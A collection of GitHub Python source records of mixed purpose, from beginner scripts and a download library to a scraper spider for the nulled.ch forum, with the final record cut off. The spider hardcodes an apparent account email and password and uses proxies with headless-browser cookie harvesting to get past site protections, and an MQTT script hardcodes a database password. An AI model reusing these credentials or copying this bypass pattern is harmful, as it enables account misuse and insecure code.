(\"forum\", \"0003_auto_20150414_2324\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"topic\",\n name=\"is_locked\",\n field=models.BooleanField(default=False, db_index=True, verbose_name=b\"Est verrouill\\xc3\\xa9\"),\n preserve_default=True,\n ),\n ]\n", "repo_name": "zestedesavoir/zds-site", "sub_path": "zds/forum/migrations/0003_auto_20151110_1145.py", "file_name": "0003_auto_20151110_1145.py", "file_ext": "py", "file_size_in_byte": 428, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 262, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 4, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "72269673793", "text": "##################### Extra Hard Starting Project ######################\nimport datetime as dt\nimport pandas as pd\nimport random\nimport smtplib\n\nnow = dt.datetime.now()\ncurr_month = now.month\ncurr_day = now.day\ntoday=(curr_month,curr_day)\n\ndata = pd.read_csv(\"birthdays.csv\")\nbirthday_dictionary = {(data['month'],data['day']):row for (index,row) in data.iterrows()}\n\nif today in birthday_dictionary:\n birthday_person = birthday_dictionary[today]\n file=f\"\\letter_templates\\letter_{random.choice(1,3)}.txt\"\n with open(file) as letter_file:\n contents = letter_file.read()\n contents = contents.replace('[NAME]',birthday_person['name'])\n\n with smtplib.SMTP('connection_name') as connection:\n connection.starttls()\n connection.login(EMAIL,PASS)\n connection.sendmail(\n from_addr=EMAIL,\n to_addrs=birthday_person['email'],\n msg=f'HAPPY BIRTHDAY\\n\\n{contents}'\n )\n\n\n\n\n\n", "repo_name": "shailparmar03/PythonProjects", "sub_path": "birthday-wisher/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "1135940239", "text": "import web\nimport requests\nimport json\nresultado = requests.get(\"https://pokeapi.co/api/v2/pokemon/geodude\")\nprint(resultado.status_code)\nprint(resultado.headers[\"Content-Type\"])\npokemon = resultado.json()\n#nombre\nname = pokemon[\"name\"]\nprint(name)\n#especie\ntype = pokemon[\"types\"]\ntypes = type[0]\ntype_0=types[\"type\"]\ntype_name = type_0[\"name\"]\nprint(type_name)\n#abilidad\nability = pokemon[\"abilities\"]\nabilities = ability[0]\nability_0 = abilities[\"ability\"]\nability_name = ability_0 [\"name\"]\nprint(ability_name)\n#url\nspecies = pokemon[\"species\"]\nurl = species[\"url\"]\nprint(url)", "repo_name": "Kevin12-0/Aplicaciones-Web-Orientadas-a-Servicios", "sub_path": "api_pokemon_api/api_consumer.py", "file_name": "api_consumer.py", "file_ext": "py", "file_size_in_byte": 579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "20218254039", "text": "\"\"\"\nHTTP-based download of files.\n\"\"\"\nfrom __future__ import absolute_import\n\nimport logging\nimport re\nimport time\nfrom contextlib import closing\nfrom typing import Tuple, Sequence\nfrom urllib.parse import urljoin\n\nimport feedparser\nimport requests\nfrom lxml import etree\nfrom requests import Session\nfrom requests.auth import HTTPBasicAuth\n\nfrom ._core import SimpleObject, DataSource, fetch_file, RemoteFetchException, ResultHandler, FilenameTransform\n\nDEFAULT_CONNECT_TIMEOUT_SECS = 100\n\n_log = logging.getLogger(__name__)\n\n\nclass SessionWithRedirection(requests.Session):\n \"\"\"\n Enables authentication headers to be retained for configured hosts\n \"\"\"\n\n TRUSTED_HOSTS = ['urs.earthdata.nasa.gov']\n\n def should_strip_auth(self, old_url, new_url):\n original_parsed = requests.utils.urlparse(old_url)\n redirect_parsed = requests.utils.urlparse(new_url)\n\n if (original_parsed.hostname in self.TRUSTED_HOSTS or\n redirect_parsed.hostname in self.TRUSTED_HOSTS):\n return False\n return super(SessionWithRedirection, self).should_strip_auth(old_url, new_url)\n\n def rebuild_auth(self, prepared_request, response):\n headers = prepared_request.headers\n\n url = prepared_request.url\n\n if 'Authorization' in headers:\n original_parsed = requests.utils.urlparse(response.request.url)\n redirect_parsed = requests.utils.urlparse(url)\n\n if ((original_parsed.hostname != redirect_parsed.hostname) and\n (redirect_parsed.hostname not in self.TRUSTED_HOSTS) and\n (original_parsed.hostname not in self.TRUSTED_HOSTS)):\n del headers['Authorization']\n\n\ndef filename_from_url(url):\n \"\"\"\n Get the filename component of the URL\n\n >>> filename_from_url('http://example.com/somefile.zip')\n 'somefile.zip'\n >>> filename_from_url('http://oceandata.sci.gsfc.nasa.gov/Ancillary/LUTs/modis/utcpole.dat')\n 'utcpole.dat'\n \"\"\"\n return url.split('/')[-1]\n\n\nclass HttpPostAction(SimpleObject):\n \"\"\"\n Perform a simple HTTP-Post. Intended for use as a 'beforehand' action.\n\n (such as posting login credentials before retrievals)\n \"\"\"\n\n def __init__(self, url, params):\n \"\"\"\n :type url: str\n :type params: dict of (str, str)\n \"\"\"\n self.url = url\n self.params = params\n\n def get_result(self, session):\n \"\"\"\n Return the closing result of the action.\n\n :type session: requests.Session\n \"\"\"\n return closing(session.post(self.url, params=self.params))\n\n\nURL = str\n\n\nclass HttpAuthAction(SimpleObject):\n \"\"\"\n Performs authentication for the session provided.\n \"\"\"\n\n def __init__(self, url, username, password,\n connection_timeout=DEFAULT_CONNECT_TIMEOUT_SECS):\n self.url = url\n self.username_password = (username, password)\n self.connection_timeout = connection_timeout\n\n def get_result(self, session):\n # This was uncommented,\n # but I think it is asking for a redirect to the login page?\n login_url = session.request('get', self.url, timeout=self.connection_timeout).url\n\n # Install into urllib.\n if self.username_password:\n session.auth = HTTPBasicAuth(*self.username_password)\n\n res = session.get(login_url, auth=self.username_password, timeout=self.connection_timeout)\n if res.status_code != 200:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=login_url, body=res.text)\n )\n\n return closing(res)\n\n def __repr__(self):\n fields = self.__dict__\n\n # We'd rather not log the password.\n if self.username_password:\n fields = fields.copy()\n fields['username_password'] = (self.username_password[0], '<**redacted**>')\n\n return '%s(%r)' % (self.__class__.__name__, fields)\n\n\nclass _HttpBaseSource(DataSource):\n \"\"\"\n Base class for HTTP retrievals.\n \"\"\"\n\n def __init__(self,\n target_dir: str,\n url: URL = None,\n urls: Sequence[URL] = None,\n filename_transform: FilenameTransform = None,\n beforehand: HttpPostAction = None,\n connection_timeout: float = DEFAULT_CONNECT_TIMEOUT_SECS,\n retry_count: int = 3,\n retry_delay_seconds: float = 5.0, ):\n super(_HttpBaseSource, self).__init__()\n self.target_dir = target_dir\n self.beforehand = beforehand\n\n self.filename_transform = filename_transform\n\n # Can either specify one URL or a list of URLs\n self.url = url\n self.urls = urls\n\n # Connection timeout in seconds\n self.connection_timeout = connection_timeout\n\n self.retry_count = retry_count\n self.retry_delay_seconds = retry_delay_seconds\n\n def _get_all_urls(self) -> Sequence[URL]:\n \"\"\"\n \"\"\"\n all_urls = []\n if self.urls:\n all_urls.extend(self.urls)\n if self.url:\n all_urls.append(self.url)\n return all_urls\n\n def trigger(self, reporter: ResultHandler):\n \"\"\"\n Trigger a download from the configured URLs.\n\n This will call the overridden trigger_url() function\n for each URL.\n\n \"\"\"\n all_urls = self._get_all_urls()\n if not all_urls:\n raise RuntimeError(\"HTTP type requires either 'url' or 'urls'.\")\n\n session = SessionWithRedirection()\n\n if self.beforehand:\n _log.debug('Triggering %r', self.beforehand)\n with self.beforehand.get_result(session) as res:\n if res.status_code != 200:\n _log.error('Status code %r received for %r.', res.status_code, self.beforehand)\n _log.debug('Error received text: %r', res.text)\n for url in all_urls:\n _log.debug(\"Triggering %r\", url)\n self.trigger_url(reporter, session, url)\n\n def trigger_url(self, reporter: ResultHandler, session: Session, url: URL):\n \"\"\"\n Trigger for the given URL. Overridden by subclasses.\n \"\"\"\n raise NotImplementedError(\"Individual URL trigger not implemented\")\n\n def _fetch_files(self,\n urls_filenames: Sequence[Tuple[URL, str]],\n reporter: ResultHandler,\n session: Session = requests,\n override_existing=False):\n \"\"\"\n Utility method for fetching HTTP URL to the target folder.\n \"\"\"\n\n def do_fetch(t: str):\n \"\"\"Fetch data to file path t\"\"\"\n\n res = session.get(url, stream=True, timeout=self.connection_timeout)\n if not res.ok:\n body = res.text\n _log.debug('Received text %r', res.text)\n reporter.file_error(url, \"Status code %r\" % res.status_code, body)\n return False\n\n with open(t, 'wb') as f:\n for chunk in res.iter_content(4096):\n if chunk:\n f.write(chunk)\n f.flush()\n return True\n\n for url, target_name in urls_filenames:\n attempt_count = 0\n while True:\n did_succeed = fetch_file(\n url,\n do_fetch,\n reporter,\n target_name,\n self.target_dir,\n filename_transform=self.filename_transform,\n override_existing=override_existing\n )\n if did_succeed or attempt_count > self.retry_count:\n break\n\n attempt_count += 1\n _log.debug('Will retry, attempt %s', attempt_count)\n time.sleep(self.retry_delay_seconds * attempt_count)\n\n\nclass HttpSource(_HttpBaseSource):\n \"\"\"\n Fetch static HTTP URLs.\n\n This is useful for unchanging URLs that need to be\n repeatedly updated.\n \"\"\"\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download URL, overriding existing.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n name = filename_from_url(url)\n self._fetch_files([(url, name)], reporter, session=session, override_existing=True)\n\n\nclass HttpListingSource(_HttpBaseSource):\n \"\"\"\n Fetch files from a HTTP listing page.\n\n A pattern can be supplied to limit files by filename.\n \"\"\"\n\n def __init__(self,\n target_dir,\n url=None,\n urls=None,\n name_pattern='.*',\n filename_transform=None,\n beforehand=None,\n connection_timeout=DEFAULT_CONNECT_TIMEOUT_SECS,\n retry_count: int = 3,\n retry_delay_seconds: float = 5.0):\n super(HttpListingSource, self).__init__(target_dir,\n url=url,\n urls=urls,\n filename_transform=filename_transform,\n beforehand=beforehand,\n connection_timeout=connection_timeout,\n retry_count=retry_count,\n retry_delay_seconds=retry_delay_seconds)\n self.name_pattern = name_pattern\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download the given listing page, and any links that match the name pattern.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n res = session.get(url, timeout=self.connection_timeout)\n if res.status_code == 404:\n _log.debug(\"Listing page doesn't exist yet. Skipping.\")\n return\n\n if not res.ok:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=url, body=res.text)\n )\n\n # pylint fails to identify native functions under our virtualenv...\n #: pylint: disable=no-member\n page = etree.fromstring(res.text, parser=etree.HTMLParser())\n\n url = res.url\n\n anchors = page.xpath('//a')\n\n # Build a list of URLs to fetch\n urls_names = []\n for anchor in anchors:\n # : :type: str\n name = anchor.text\n if 'href' not in anchor.attrib:\n continue\n\n href_ = anchor.attrib['href']\n\n if not name:\n _log.info(\"Skipping empty anchor for %r\", href_)\n continue\n\n source_url = urljoin(url, href_)\n\n if not href_.endswith(name):\n _log.info('Not a filename %r, skipping.', name)\n continue\n\n if not re.match(self.name_pattern, name):\n _log.info(\"Filename (%r) doesn't match pattern, skipping.\", name)\n continue\n urls_names.append((source_url, name))\n\n self._fetch_files(\n urls_names,\n reporter,\n session=session\n # ,override_existing=True\n )\n\n\nclass RssSource(_HttpBaseSource):\n \"\"\"\n Fetch any files from the given RSS URL.\n\n The title of feed entries is assumed to be the filename.\n \"\"\"\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download RSS feed and fetch missing files.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n # Fetch feed.\n res = session.get(url, timeout=self.connection_timeout)\n\n if res.status_code != 200:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=url, body=res.text)\n )\n\n feed = feedparser.parse(res.text)\n self._fetch_files(\n [(entry.link, entry.title) for entry in feed.entries],\n reporter,\n session=session\n # ,override_existing=True\n )\n", "repo_name": "GeoscienceAustralia/fetch", "sub_path": "fetch/http.py", "file_name": "http.py", "file_ext": "py", "file_size_in_byte": 12757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 26, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 49, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 49, "usage_type": "attribute"}, {"api_name": "_core.SimpleObject", "line_number": 69, "usage_type": "name"}, {"api_name": "contextlib.closing", "line_number": 90, "usage_type": "call"}, {"api_name": "_core.SimpleObject", "line_number": 96, "usage_type": "name"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 114, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 120, "usage_type": "call"}, {"api_name": "contextlib.closing", "line_number": 125, "usage_type": "call"}, {"api_name": "_core.DataSource", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 146, "usage_type": "name"}, {"api_name": "_core.FilenameTransform", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 168, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 178, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 202, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 202, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 209, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 210, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 211, "usage_type": "name"}, {"api_name": "_core.fetch_file", "line_number": 237, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 251, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 315, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 322, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 322, "usage_type": "name"}, {"api_name": "lxml.etree.HTMLParser", "line_number": 322, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 342, "usage_type": "call"}, {"api_name": "re.match", "line_number": 348, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 381, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 386, "usage_type": "call"}]} +{"seq_id": "72653104833", "text": "from flask import Flask, render_template, jsonify, request\nimport whois\nimport datetime\n\napp = Flask(__name__)\napp.debug = True\napp.config['TEMPLATE_AUTO_RELOAD'] = True\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/search', methods=['POST'])\ndef search():\n url = request.form['url']\n w = whois.whois(url)\n w.expiration_date # dates converted to datetime object\n datetime.datetime(2013, 6, 26, 0, 0)\n w.text\n return render_template('search.html', url=url, record=w)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8000, host='127.0.0.1')", "repo_name": "GrahamMorbyDev/whois-flask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "whois.whois", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "30836310932", "text": "\"\"\"options ={\"program_type\": \"light\",\n \"input_type\":\"single\",\n \"job_name\": \"default_name\", \n \"ref_ls\": [],\n \"thresh\":70.9\n\n }\"\"\"\nfrom dtypes.Frame import Frame\nfrom os import mkdir\nimport sqlite3 \nimport uuid\nfrom utils.sql_utils import adapt_array,convert_array\nfrom numpy import ndarray,array\nclass Job:\n def __init__(self,options,db_ref):\n self.job_name = options[\"job_name\"]\n self.job_id = str(uuid.uuid4()).replace('-','') + \"_\" + self.job_name\n self.type = int(options[\"input_type\"])\n self.tags = str(options[\"tags\"])\n self.frame_ls = []\n self.frame_ref_ls = []\n mkdir(\"./job-data/\" + self.job_name)\n self.frame_paths = options['frame_paths']\n self.create_frames(options,db_ref,options[\"frame_paths\"])\n self.constants = options[\"constants\"]\n self.update_ref_ls()\n self.add_job_db()\n\n def __repr__(self):\n s = \"(JOB) job_name:\" + self.job_name + \"\\t job_id:\" + self.job_id\n s = s + \"\\t type:\" + str(type) + \"\\t tags\" + str(self.tags)\n return s\n\n def update_ref_ls(self):\n for frame in self.frame_ls:\n self.frame_ref_ls.append(frame.id)\n print(\"job frame ref ls updated\")\n\n def add_job_db(self):\n sqlite3.register_adapter(ndarray,adapt_array)\n sqlite3.register_converter(\"array\",convert_array)\n conn = sqlite3.connect(\"/Users/jackkelly/PycharmProjects/win_break/dash_app/data/pore.db\", detect_types=sqlite3.PARSE_DECLTYPES)\n \n out_path = \".\" + \"/job-data/\" + self.job_name\n sql_str = ''' insert into jobs_index(job_id,job_name,job_path,job_type,tags,frame_ls,frame_names)\n VALUES(?,?,?,?,?,?,?)'''\n conn.execute(sql_str,(self.job_id,self.job_name,out_path,self.type,self.tags,array(self.frame_ref_ls),array(self.frame_paths)))\n conn.commit()\n conn.close()\n #print(\"image data pushed to database\")\n\n\n def create_frames(self, options,db_ref,frame_paths):\n i =0\n out_path = \"/job-data/\"\n for fpath in frame_paths:\n print(\"fpath\", fpath)\n f = Frame(fpath,out_path,options[\"program_type\"],\n options[\"constants\"],\n db_ref,\n self.job_name,\n self.tags)\n self.frame_ls.append(f)\n print(\"frames have been finished\")\n", "repo_name": "Jack-kelly-22/ps-4", "sub_path": "dtypes/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 2409, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "uuid.uuid4", "line_number": 17, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlite3.register_adapter", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 40, "usage_type": "argument"}, {"api_name": "utils.sql_utils.adapt_array", "line_number": 40, "usage_type": "argument"}, {"api_name": "sqlite3.register_converter", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.sql_utils.convert_array", "line_number": 41, "usage_type": "argument"}, {"api_name": "sqlite3.connect", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlite3.PARSE_DECLTYPES", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "dtypes.Frame.Frame", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "72042519235", "text": "import geopandas as gpd\nimport json\nimport pygeohash as gh\nfrom shapely.geometry import Polygon, MultiPolygon, shape\n\ndef extract_vertices(geometry):\n vertices = []\n geom_shape = shape(geometry)\n for coord in geom_shape.exterior.coords:\n lon, lat = coord[:2]\n vertices.append((lon, lat))\n return vertices\n\ndef longest_common_geohash_prefix(geohashes):\n if not geohashes:\n return \"\"\n\n prefix = geohashes[0]\n for geohash in geohashes[1:]:\n i = 0\n while i < len(prefix) and i < len(geohash) and prefix[i] == geohash[i]:\n i += 1\n prefix = prefix[:i]\n\n return prefix\n\ndef geohash_json_feature_representation(vertices, name):\n # Generate the geohashes for a feature\n geohashes = [gh.encode(vertex[1], vertex[0], precision=10) for vertex in vertices]\n\n # Find the longest common prefix\n prefix = longest_common_geohash_prefix(geohashes)\n\n # Trim the prefix from each geohash\n trimmed_geohashes = [geohash[len(prefix):] for geohash in geohashes]\n\n json_output = {\n 'n': name,\n 'g': trimmed_geohashes,\n 'p': prefix\n }\n return json_output\n\n# Path to the Shapefile\nshapefile_path = '/path/to/shapefile.shp'\n\n# Read the Shapefile using geopandas\ndata = gpd.read_file(shapefile_path)\ndata = data[data.geometry.geom_type == 'Polygon']\ndata = data.to_crs(\"EPSG:4326\")\n\nfeatures = []\n\nfor index, feature in data.iterrows():\n vertices = extract_vertices(feature['geometry'])\n features.append(geohash_json_feature_representation(vertices, feature['NAME']))\n\n# Save the JSON output to file\noutput_json = '/path/to/output.json'\n\nwith open(output_json, 'w') as file:\n file.write(json.dumps(features))\n\nprint('JSON exported successfully.')\n", "repo_name": "Tawitwins/geocoding-blockchain", "sub_path": "geohashing_prefix_json.py", "file_name": "geohashing_prefix_json.py", "file_ext": "py", "file_size_in_byte": 1752, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "shapely.geometry.shape", "line_number": 8, "usage_type": "call"}, {"api_name": "pygeohash.encode", "line_number": 29, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "33398148578", "text": "#!python3\nimport paho.mqtt.client as mqtt #import the client1\nimport time\nimport pymysql\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n client.connected_flag=True #set flag\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\n\ndef on_message(client, userdata, message):\n time.sleep(1)\n\n\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"1234\", database=\"Gym\")\n cur = con.cursor()\n cur.execute(\"SELECT MAX(userid) from user\")\n g = cur.fetchone()\n cur.execute( \"update user set phone=%s WHERE userid=%s\",(str(message.payload.decode(\"utf-8\")), g))\n\n print(\"received message =\",str(message.payload.decode(\"utf-8\")))\nbl =True\nk=0\nwhile (bl==True):\n mqtt.Client.connected_flag=False#create flag in class\n broker=\"broker.hivemq.com\"\n port=1883\n\n client = mqtt.Client(\"clientId-lUfDDEJCUm\") #create new instance\n #client.username_pw_set(username=\"Ubido\",password=\"password\")\n\n client.on_connect=on_connect #bind call back function\n client.on_message=on_message\n client.loop_start()\n print(\"Connecting to broker \",broker)\n try:\n client.connect(broker) #connect to broker\n\n\n except Exception as e:\n print(e)\n\n while not client.connected_flag: #wait in loop\n print(\"In wait loop\")\n time.sleep(1)\n print(\"in Main Loop\")\n\n print(\"subscribing \")\n client.subscribe(\"Room/Lamp\") # subscribe\n time.sleep(2)\n #print(\"publishing \")\n\n #client.publish(\"Room/Lamp\", \"1\") # publish\n\n time.sleep(4)\n client.loop_stop() #Stop loop\n print(\"here\",client.subscribe(\"Room/Lamp\"))\n\n\n client.disconnect() # disconnect\n\n\n #client.publish(\"house/light\", 1)", "repo_name": "mag1i/Gym-facerec", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "paho.mqtt.client.Client", "line_number": 27, "usage_type": "attribute"}, {"api_name": "paho.mqtt.client", "line_number": 27, "usage_type": "name"}, {"api_name": "paho.mqtt.client.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "72565393794", "text": "# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nfrom typing import List\n\nclass Solution:\n \n def __init__(self):\n self.inorder = []\n \n def inorderTraversal(self, root: TreeNode) -> List[int]:\n \n if root :\n \n self.inorderTraversal( root.left )\n self.inorder.append( root.val )\n self.inorderTraversal( root.right) \n \n return self.inorder\n \n else:\n return []\n\n\n# N : number of node in binary tree with given root\n\n## Time Complexity:\n#\n# Inorder traversal visits each node once, every single visit costs O(1).\n# There are n nodes in binary tree, thus totally it takes O( n ).\n\n## Space Complexity:\n#\n# The overhead in time is to maintain call stack for inorder traversal,\n# the call depth is O( n ) at most.\n\ndef test_bench():\n\n root = TreeNode(1)\n\n root.right = TreeNode(2)\n\n root.right.left = TreeNode(3)\n\n in_order_traversal = Solution().inorderTraversal(root)\n\n # expected output:\n '''\n [1, 3, 2]\n '''\n print( in_order_traversal )\n\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()", "repo_name": "brianchiang-tw/leetcode", "sub_path": "No_0094_Binary Tree Inorder Traversal/binary_tree_inorder_traversal_recursive.py", "file_name": "binary_tree_inorder_traversal_recursive.py", "file_ext": "py", "file_size_in_byte": 1248, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "4234516133", "text": "import os\nimport re\nimport time\nimport uuid\nimport json\n\nfrom datetime import datetime\nfrom scrapy.utils.gz import gunzip\n\nfrom selenium.webdriver import (\n Chrome,\n ChromeOptions\n)\nfrom scrapy import (\n Request,\n FormRequest,\n Selector\n)\nfrom scraper.base_scrapper import (\n SitemapSpider,\n SiteMapScrapper,\n PROXY_USERNAME,\n PROXY_PASSWORD,\n PROXY\n)\n\n\nUSERNAME = \"umeshpathak@protonmail.com\"\nPASSWORD = \"4hr63yh38a61SDW0\"\n\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) '\\\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\\\n 'Chrome/81.0.4044.138 Safari/537.36'\n\n\nclass NulledChSpider(SitemapSpider):\n name = 'nulledch_spider'\n\n # Url stuffs\n base_url = 'https://www.nulled.ch/'\n login_url = 'https://www.nulled.ch/user-login'\n \n # Xpath stuffs\n login_form_xpath = '//form[@method=\"post\"]'\n forum_xpath = '//a[contains(@href, \"forum-\")]/@href'\n pagination_xpath = '//div[@class=\"pagination\"]'\\\n '/a[@class=\"pagination_next\"]/@href'\n thread_xpath = '//tr[@class=\"inline_row\"]'\n thread_first_page_xpath = './/span[contains(@id,\"tid_\")]/a/@href'\n thread_last_page_xpath = './/td[contains(@class,\"forumdisplay_\")]/div'\\\n '/div/span[contains(@class,\"smalltext\")]'\\\n '/a[last()]/@href'\n thread_date_xpath = './/td[contains(@class,\"forumdisplay\")]'\\\n '/div[@class=\"lastpost smalltext\"]/text()[1]|'\\\n './/td[contains(@class,\"forumdisplay\")]'\\\n '/div[@class=\"lastpost smalltext\"]/span/@title'\n thread_pagination_xpath = '//div[@class=\"pagination\"]'\\\n '//a[@class=\"pagination_previous\"]/@href'\n thread_page_xpath = '//span[@class=\"pagination_current\"]/text()'\n post_date_xpath = '//div[@class=\"post_content\"]/preceding-sibling::'\\\n 'span[1]/text()[1]|//div[@class=\"post_content\"]'\\\n '/preceding-sibling::span[1]/span/@title'\\\n\n avatar_xpath = '//div[@class=\"author_avatar\"]/a/img/@src'\n\n # Login Failed Message\n login_failed_xpath = '//div[@class=\"error\"]'\n\n # Recaptcha stuffs\n recaptcha_site_key_xpath = '//div[@class=\"g-recaptcha\"]/@data-sitekey'\n\n # Regex stuffs\n topic_pattern = re.compile(\n r'thread-(\\d+)',\n re.IGNORECASE\n )\n avatar_name_pattern = re.compile(\n r\".*/(\\S+\\.\\w+)\",\n re.IGNORECASE\n )\n\n # Other settings\n use_proxy = \"On\"\n sitemap_datetime_format = '%m-%d-%Y'\n post_datetime_format = '%m-%d-%Y'\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.headers.update({\n 'User-Agent': USER_AGENT\n })\n\n def get_cookies(self, use_proxy=False):\n # Init options\n options = ChromeOptions()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n if use_proxy:\n proxy = PROXY % (PROXY_USERNAME, PROXY_PASSWORD)\n options.add_argument(f'--proxy-server={proxy}')\n options.add_argument(f'user-agent={USER_AGENT}')\n\n # Init web driver arguments\n webdriver_kwargs = {\n \"executable_path\": \"/usr/local/bin/chromedriver\",\n \"options\": options\n }\n browser = Chrome(**webdriver_kwargs)\n browser.get(self.login_url)\n time.sleep(20)\n cookies = browser.get_cookies()\n browser.quit()\n bypass_cookies = {\n c.get(\"name\"): 